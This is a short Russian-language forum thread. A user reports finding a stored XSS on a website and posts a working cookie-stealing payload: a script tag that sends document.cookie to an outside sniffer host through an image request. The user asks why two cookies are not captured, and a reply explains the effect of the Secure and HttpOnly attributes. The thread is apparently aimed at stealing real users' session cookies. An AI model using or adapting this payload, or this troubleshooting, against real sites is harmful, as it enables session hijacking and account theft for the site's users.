Добрый вечер. Нашёл активную XSS. В целом, передача кукисов работает не полностью, 2 параметра со значениями не передаются, остальные (около пяти) успешно передаются. На сайте иногда используется https протокол. Код использую обычный. Вот он: <script> img = new Image(); img.src = "http://httpz.ru/nngi2kuk5mj.gif?"+document.cookie; </script> Этот сервис https://hpc.name/sniffer/ Подскажите, в чём проблема? И возможно ли получить два параметра со значениями? Заранее спасибо.
zoke Куки с атрибутом Secure - не будут передаваться на HTTP страницы. Куки с атрибутом HTTP-only недоступны из яваскрипта вообще.
